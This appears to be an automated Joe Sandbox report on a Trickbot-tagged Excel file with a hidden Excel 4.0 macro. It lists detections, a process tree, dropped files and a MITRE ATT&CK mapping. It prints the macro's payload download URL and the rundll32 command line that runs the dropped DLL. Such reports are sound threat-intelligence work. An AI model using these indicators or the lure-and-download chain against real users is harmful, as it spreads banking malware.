Play interactive tour

Edit tour

Analysis Report ORDER787-5.xls

Overview

General Information

Sample Name:	ORDER787-5.xls
Analysis ID:	336129
MD5:	1d97c6cb50c4107498e4f0e76f539f0c
SHA1:	a4dc090837c76aed324bea19c9f62e2d47bb7bc8
SHA256:	1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4
Tags:	Trickbotxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Multi AV Scanner detection for dropped file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found malicious URLs in unpacked macro 4.0 sheet

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2340 cmdline: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2328 cmdline: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

wermgr.exe (PID: 2896 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , CommandLine: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1748, ProcessCommandLine: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , ProcessId: 2340

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\activex.ocx	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png	ReversingLabs: Detection: 15%

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: apperolew[1].png.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: global traffic

DNS query: name: www.penrithdentalimplants.com.au

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 160.153.76.195:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 160.153.76.195:443

Networking:

Found malicious URLs in unpacked macro 4.0 sheet

Show sources

Source: before.2.99.0.sheet.csv_unpack

Macro 4.0 Deobfuscator: https://www.penrithdentalimplants.com.au/ls/apperolew.png

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FBD1845.emf

Jump to behavior

Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.penrithdentalimplants.com.au

Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: before.2.99.0.sheet.csv_unpack	String found in binary or memory: https://www.penrithdentalimplants.com.au/ls/apperolew.png

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: ORDER787-5.xls	Initial sample: URLDownloadToFileA
Source: ORDER787-5.xls	Initial sample: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X I FW132 - '," jR V FK FL FM FN FO FP FQ FR FS FT FU FY FIN FX FY FZ GA GB CC GO

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: ORDER787-5.xls	Initial sample: CALL
Source: ORDER787-5.xls	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: ORDER787-5.xls

Initial sample: Sheet size: 7889

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\activex.ocx			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000B826	4_2_1000B826
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10009C77	4_2_10009C77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000BD68	4_2_1000BD68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C96E	4_2_1000C96E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005DD0	4_2_10005DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000D667	4_2_1000D667
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000C2AA	4_2_1000C2AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000E6DC	4_2_1000E6DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100057AA	4_2_100057AA

Source: ORDER787-5.xls

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 10005D6C appears 35 times

Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/13@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\CFEE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDBED.tmp

Jump to behavior

Source: ORDER787-5.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ORDER787-5.xls

Initial sample: OLE indicators encrypted = True

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_100018B0 DllRegisterServer,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,

4_2_100018B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005DB1 push ecx; ret	4_2_10005DC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A65E push ecx; ret	4_2_1000A671
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00352040 push dword ptr [edx+14h]; ret	4_2_0035214D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_003520EA push dword ptr [edx+14h]; ret	4_2_0035214D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\activex.ocx			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\activex.ocx

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: ORDER787-5.xls

Stream path 'Workbook' entropy: 7.98610242414 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_100018B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10004844 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_10004844

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_100018B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_001A0456 mov eax, dword ptr fs:[00000030h]	4_2_001A0456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_001A095E mov eax, dword ptr fs:[00000030h]	4_2_001A095E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_001E1030 mov eax, dword ptr fs:[00000030h]	4_2_001E1030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10002AB0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,

4_2_10002AB0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10004844 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_10004844
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10005081 SetUnhandledExceptionFilter,__encode_pointer,	4_2_10005081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100050A3 __decode_pointer,SetUnhandledExceptionFilter,	4_2_100050A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000A672 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	4_2_1000A672
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100026C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_100026C4

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_100090B2 cpuid

4_2_100090B2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

4_2_1000E4AD

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10007F84 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_10007F84

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_10002AB0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting31	Path Interception	Process Injection11	Masquerading11	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Security Software Discovery12	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution33	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting31	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information21	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER787-5.xls	5%	Virustotal		Browse
ORDER787-5.xls	4%	ReversingLabs	Script.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\activex.ocx	15%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png	15%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.2e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
penrithdentalimplants.com.au	1%	Virustotal		Browse
www.penrithdentalimplants.com.au	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://www.penrithdentalimplants.com.au/ls/apperolew.png	4%	Virustotal		Browse
https://www.penrithdentalimplants.com.au/ls/apperolew.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
penrithdentalimplants.com.au	160.153.76.195	true	false	1%, Virustotal, Browse	unknown
www.penrithdentalimplants.com.au	unknown	unknown	false	2%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	false		high
https://www.penrithdentalimplants.com.au/ls/apperolew.png	before.2.99.0.sheet.csv_unpack	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
160.153.76.195	unknown	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336129
Start date:	05.01.2021
Start time:	13:00:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER787-5.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@7/13@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.9% (good quality ratio 38.5%) Quality average: 75.4% Quality standard deviation: 32.3%
HCA Information:	Successful, ratio: 78% Number of executed functions: 15 Number of non-executed functions: 14
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 8.248.135.254, 8.248.131.254, 67.27.157.126, 8.248.115.254, 8.248.139.254 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

